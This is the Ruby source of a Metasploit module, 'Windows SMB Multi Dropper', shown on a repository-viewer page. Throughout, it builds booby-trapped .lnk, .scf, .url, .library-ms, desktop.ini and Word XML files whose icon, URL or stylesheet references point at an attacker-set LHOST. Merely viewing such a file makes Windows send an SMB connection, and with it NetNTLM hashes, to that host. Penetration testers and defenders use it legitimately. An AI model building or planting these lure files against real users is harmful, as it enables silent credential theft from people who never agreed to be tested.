Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/fileformat/multidrop.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::FILEFORMAT

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Windows SMB Multi Dropper',

14
        'Description' => %q{

15
          This module dependent on the given filename extension creates either

16
          a .lnk, .scf, .url, .xml, .library-ms, or desktop.ini file which includes

17
          a reference to the specified remote host, causing SMB connections to be

18
          initiated from any user that views the file.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'Richard Davy - secureyourit.co.uk',  # Module written by Richard Davy

23
          'mubix',                              # Lnk Creation Code written by Mubix

24
          'asoto-r7',                           # Word XML creation code

25
          'hyp3rlinx',                          # .library-ms technique

26
          'bcoles',                             # Added .library-ms support

27
        ],

28
        'Platform' => [ 'win' ],

29
        'References' => [

30
          ['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],

31
          ['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/'],

32
          ['URL', 'https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/'],

33
          ['URL', 'https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt'],

34
        ],

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42
    register_options(

43
      [

44
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),

45
        OptString.new('FILENAME', [ true, 'Filename - supports *.lnk, *.scf, *.url, *.xml, *.library-ms, desktop.ini', 'word.lnk']),

46
      ]

47
    )

48
  end

49


50
  def run

51
    if datastore['FILENAME'].chars.last(3).join == 'lnk'

52
      createlnk

53
    elsif datastore['FILENAME'].chars.last(3).join == 'scf'

54
      createscf

55
    elsif datastore['FILENAME'] == 'desktop.ini'

56
      create_desktopini

57
    elsif datastore['FILENAME'].chars.last(3).join == 'url'

58
      create_url

59
    elsif datastore['FILENAME'].chars.last(3).join == 'xml'

60
      create_xml

61
    elsif datastore['FILENAME'].ends_with?('.library-ms')

62
      create_libraryms

63
    else

64
      fail_with(Failure::BadConfig, 'Invalid FILENAME option')

65
    end

66
  end

67


68
  def createlnk

69
    # Code below taken from module droplnk.rb written by Mubix

70
    lnk = ''

71
    lnk << "\x4c\x00\x00\x00"                  # Header size

72
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  # Link CLSID

73
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"

74
    lnk << "\xdb\x00\x00\x00"                  # Link flags

75
    lnk << "\x20\x00\x00\x00"                  # File attributes

76
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Creation time

77
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Access time

78
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Write time

79
    lnk << "\x00\x00\x00\x00"                  # File size

80
    lnk << "\x00\x00\x00\x00"                  # Icon index

81
    lnk << "\x01\x00\x00\x00"                  # Show command

82
    lnk << "\x00\x00"                          # Hotkey

83
    lnk << "\x00\x00"                          # Reserved

84
    lnk << "\x00\x00\x00\x00"                  # Reserved

85
    lnk << "\x00\x00\x00\x00"                  # Reserved

86
    lnk << "\x7b\x00"                          # IDListSize

87
    # sIDList

88
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"

89
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"

90
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"

91
    lnk << 'C:\\'

92
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

93
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"

94
    lnk << "\x00"

95
    lnk << 'AUTOEXEC.BAT'

96
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"

97
    lnk << "\x5b\x15\x14\x00\x00\x00"

98
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')

99
    lnk << "\x00\x00\x1c\x00\x00\x00"

100
    # sLinkInfo

101
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"

102
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"

103
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"

104
    lnk << "\x00\x00\x00"

105
    lnk << 'C:\\AUTOEXEC.BAT'

106
    lnk << "\x00\x00\x0e\x00"

107
    # RELATIVE_PATH

108
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')

109
    lnk << "\x03\x00"

110
    # WORKING_DIR

111
    lnk << Rex::Text.to_unicode('C:\\')

112
    # ICON LOCATION

113
    lnk << "\x1c\x00"

114
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\icon.ico")

115
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"

116
    lnk << 'computer'

117
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

118
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

119
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

120
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

121
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

122


123
    file_create(lnk)

124
  end

125


126
  def createscf

127
    scf = ''

128
    scf << "[Shell]\n"

129
    scf << "Command=2\n"

130
    scf << "IconFile=\\\\#{datastore['LHOST']}\\test.ico\n"

131
    scf << "[Taskbar]\n"

132
    scf << 'Command=ToggleDesktop'

133


134
    file_create(scf)

135
  end

136


137
  def create_desktopini

138
    ini = ''

139
    ini << "[.ShellClassInfo]\n"

140
    ini << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"

141
    ini << 'IconIndex=1337'

142


143
    file_create(ini)

144
  end

145


146
  def create_url

147
    url = ''

148
    url << "[InternetShortcut]\n"

149
    url << "URL=file://#{datastore['LHOST']}/url.html\n"

150
    url << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"

151


152
    file_create(url)

153
  end

154


155
  def create_libraryms

156
    xml = ''

157
    xml << '<?xml version="1.0" encoding="UTF-8"?>'

158
    xml << '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'

159
    xml << '<name>@shell32.dll,-34575</name>'

160
    xml << '<ownerSID>S-1-5-21-372074477-2495183225-776587326-1000</ownerSID>'

161
    xml << '<version>1</version>'

162
    xml << '<isLibraryPinned>true</isLibraryPinned>'

163
    xml << "<iconReference>\\\\#{datastore['LHOST']}\\icon.ico</iconReference>"

164
    xml << '<templateInfo>'

165
    xml << '<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>'

166
    xml << '</templateInfo>'

167
    xml << '<searchConnectorDescriptionList>'

168
    xml << '<searchConnectorDescription publisher="Microsoft" product="Windows">'

169
    xml << '<description>@shell32.dll,-34577</description>'

170
    xml << '<isDefaultSaveLocation>true</isDefaultSaveLocation>'

171
    xml << '<simpleLocation>'

172
    xml << '<url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>'

173
    xml << '<serialized>MBAAAEAFCAAA...MFNVAAAAAA</serialized>'

174
    xml << '</simpleLocation>'

175
    xml << '</searchConnectorDescription>'

176
    xml << '<searchConnectorDescription publisher="Microsoft" product="Windows">'

177
    xml << '<description>@shell32.dll,-34579</description>'

178
    xml << '<isDefaultNonOwnerSaveLocation>true</isDefaultNonOwnerSaveLocation>'

179
    xml << '<simpleLocation>'

180
    xml << '<url>knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634}</url>'

181
    xml << '<serialized>MBAAAEAFCAAA...HJIfK9AAAAAA</serialized>'

182
    xml << '</simpleLocation>'

183
    xml << '</searchConnectorDescription>'

184
    xml << '</searchConnectorDescriptionList>'

185
    xml << '</libraryDescription>'

186


187
    file_create(xml)

188
  end

189


190
  def create_xml

191
    xml = ''

192
    xml << "<?xml version='1.0' encoding='utf-8' ?>"

193
    xml << "<?mso-application progid='Word.Document'?>"

194
    xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"

195
    xml << '<Text>'

196
    xml << ' FATAL ERROR: The document failed to render properly.'

197
    xml << '</Text>'

198


199
    file_create(xml)

200
  end

201


202
end

203


204